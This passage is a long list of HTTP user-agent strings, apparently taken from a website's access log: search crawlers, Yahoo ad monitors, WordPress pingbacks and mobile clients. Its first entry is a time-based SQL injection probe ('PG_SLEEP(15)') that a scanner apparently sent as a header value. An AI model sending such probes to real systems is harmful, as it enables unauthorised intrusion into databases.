941=(SELECT 941 FROM PG_SLEEP(15))-- +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621604238-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621604250-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621607993-10 +WhatsApp/2.21.11.7 A +WhatsApp/2.21.11.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621560032-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621569970-0 +PHP-Curl-Class/4.13.0 (+https://github.com/php-curl-class/php-curl-class) PHP/7.4.9 curl/7.69.1 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 5.0.2; GT-S5360 ) U2/1.0.0 Mobile +GuzzleHttp/6.5.5 curl/7.47.0 PHP/7.2.31-1+ubuntu16.04.1+deb.sury.org+1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621642828-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621651400-0 +python-requests/2.2.1 CPython/3.4.3 Linux/3.13.0 +WordPress/3.3.1; http://highbloodpressurereports.com +PHP-Curl-Class/8.8.0 (+https://github.com/php-curl-class/php-curl-class) PHP/7.1.33 curl/7.29.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621645527-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621655189-0 +WhatsApp/2.21.5.13 A +Mozilla/5.0 (Windows NT 10.0) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 +WhatsApp/2.21.11.2 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 5.1.1; AS-5433_Secret ) U2/1.0.0 Mobile +sdd +WordPress/5.5.5; https://thefaq.ru +WordPress/5.7.2; https://hindisuvidha.com +WordPress.com; https://dateready.org +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621783381-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621794014-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621811089-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621811073-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621730571-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621737988-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621812001-0 +FDM/6.14.2.3973 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/83.0.4103.116 Safari/537.36 Prerender (+https://github.com/prerender/prerender) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/90.0.4430.97 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1621793051-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.1.2; SM-J727T1 ) U2/1.0.0 Mobile +WordPress.com; http://logincast.com +WordPress/5.7.2; https://logincast.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621884214-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621888883-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621868410-0 +WordPress/5.7.2; https://shiphangnhanh.com.vn +Apache-HttpClient/4.5.8 (Java/1.8.0_262) +findlinks/2.0.9 (+http://wortschatz.uni-leipzig.de/findlinks/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621897167-0 +WhatsApp/2.21.100.15 i +Apache-HttpClient/4.0-beta2+(java+1.5) +Botbox TV/1.0 (Linux;Android 9.1.2) ExoPlayerLib/2.11.3 +yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_75; Europe/en) http://yacy.net/bot.html +WordPress/5.7.2; https://help.britecore.com +Apache-HttpClient/4.5.2 (Java/1.8.0_281) +WordPress/5.5.5; https://faithhopecharityrace.com +WordPress/5.7.2; http://composser.ru +Apache-HttpClient/4.5.3 (Java/11.0.11) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621985821-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621905766-0 +WordPress/5.7.2; https://www.beatcameraa.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621915015-0 +WhatsApp/2.21.11.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621957764-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 PTST/210524.182033 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 7.1.1; Micromax_Q4101 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://findappdownload.com +WhatsApp/2.20.205.16 Android/9 Device/itel-itel_L5002P +python-requests/2.7.0 CPython/2.7.18 Windows/7 +WordPress/5.7.2; http://iwiki +WordPress/4.7.5; http://usapowerunlimited.com; verifying pingback from 1.164.12.33 +WhatsApp/2.21.10.16 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622045369-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622060124-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621992743-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622001997-0 +WordPress/3.7.1; http://blog.infowebmaster.fr +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622037560-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622037561-0 +WhatsApp/2.21.11.9 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622059776-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 PTST/210525.130041 +MeltwaterNews www.meltwater.com +Apache-HttpClient/4.5.2 (Java/1.8.0_202) +WordPress/5.7.2; https://udil.fr +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622031887-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622058285-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622031885-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622058284-0 +WordPress/5.7.1; https://www.comparitech.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622074421-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622082189-0 +WhatsApp/2.21.11.10 A +WhatsApp/2.21.10.15 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622124130-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622078118-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622085166-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622113378-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622113399-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622131337-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622133959-0 +WordPress/5.7.2; https://hypeaker.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 PTST/210526.175552 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1622108623-60 +WordPress/5.7.2; https://computer-mouse.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 7.0; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622106126-0 +yacybot (/global; amd64 Linux 4.15.0-143-generic; java 11.0.11; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622106125-0 +UNTRUSTED/1.0 UCWEB/2.0 (Java; U; MIDP-2.0; ru; MotorolaVE66) U2/1.0.0 UCBrowser/9.4.1.377 U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622162424-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622182533-0 +WordPress/5.7.2; https://hack2know.how +AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 DuckDuckGo/5 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622169711-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622214489-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622164569-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622185899-0 +WhatsApp/2.21.11.11 A +WordPress/5.7.1; https://www.axians-ewaste.com +WordPress/5.7.2; https://semnestalo.pw +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622220050-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622237753-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622241487-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622241494-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/86.0.4240.75 Safari/537.36 Prerender (+https://github.com/prerender/prerender) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 8.0.0; SM-N910H ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1622191891-60 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1622192203-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 7.1.1; SM-G600FY ) U2/1.0.0 Mobile +WordPress/5.0.13; https://kkg.by +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0; SM-J330G ) U2/1.0.0 Mobile +Botbox TV/1.2 (Linux;Android 7.1.2) ExoPlayerLib/2.11.3 +Apache-HttpClient/4.5.12 (Java/1.8.0_291) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622248137-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622272881-0 +Y!J-BRJ/YATS crawler (http://help.yahoo.co.jp/help/jp/search/indexing/indexing-15.html) +WordPress/5.6.4; http://lyhytkampaus.com; verifying pingback from 79.137.112.173 +WordPress/5.7; https://www.fortlangleycanoeclub.ca; verifying pingback from 142.93.149.240 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622246637-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622329670-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622255755-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622280235-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622292705-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 7.1.1; LG-X230 ) U2/1.0.0 Mobile +WordPress/4.9.8; https://tsf.co.ir +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 7.1.2; SM-J330G ) U2/1.0.0 Mobile +yacybot (/global; amd64 Linux 5.4.0-28-generic; java 1.8.0_292; Europe/en) http://yacy.net/bot.html +curl/7.77.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622307580-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622307581-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622307582-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622307594-10 +larbin_2.6.3 (larbin2.6.3@unspecified.mail) +curl/7.10.6 (i386-redhat-linux-gnu) libcurl/7.10.6 OpenSSL/0.9.7a ipv6 zlib/1.1.4 +WordPress/5.7.2; https://www.rushprnews.com; verifying pingback from 51.68.152.229 +WordPress/4.9.18; https://blog.sharjahcityguide.com; verifying pingback from 94.231.124.252 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622334348-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622343429-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 8.1.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622338247-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622346562-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622390527-0 +libwww-perl/6.54 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1622338404-60 +WordPress/5.7.2; https://3xru.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 7.1.1; GT-S5360 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.5.785 (SpeedMode; Proxy; Android 7.1.2; Redmi_Note_5A ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622333123-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622342345-0 +WordPress.com; https://wissenohnegrenzen.wordpress.com +Java-http-client/11.0.11 +WordPress/5.5.5; https://e-watertechnologies.com +yacybot (/global; amd64 Linux 4.19.0-16-amd64; java 11.0.11; Europe/en) http://yacy.net/bot.html +Tiny Tiny RSS/21.05-92c78be (http://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622482433-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622488450-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622497516-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622421800-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622430704-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622480599-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622483037-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622483156-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622485094-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 4.4.4; GT-S5360 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622496404-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1622477673-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622444734-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622444732-0 +Snapchat/11.28.1.40 (iPhone11,8; iOS 14.4.2; gzip +WordPress/5.3.2; https://www.mustpost.today +YOURLS v1.7.9 +http://yourls.org/ (running on https://alsi.ga) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36 PTST/210526.175552 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622568829-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622583953-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622508074-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622515583-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622525515-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622568798-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622568799-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622568808-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622568809-0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +CyberPatrol SiteCat Webbot (http://www.cyberpatrol.com/cyberpatrolcrawler.asp) +WordPress/5.7.2; https://win-torrent.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; 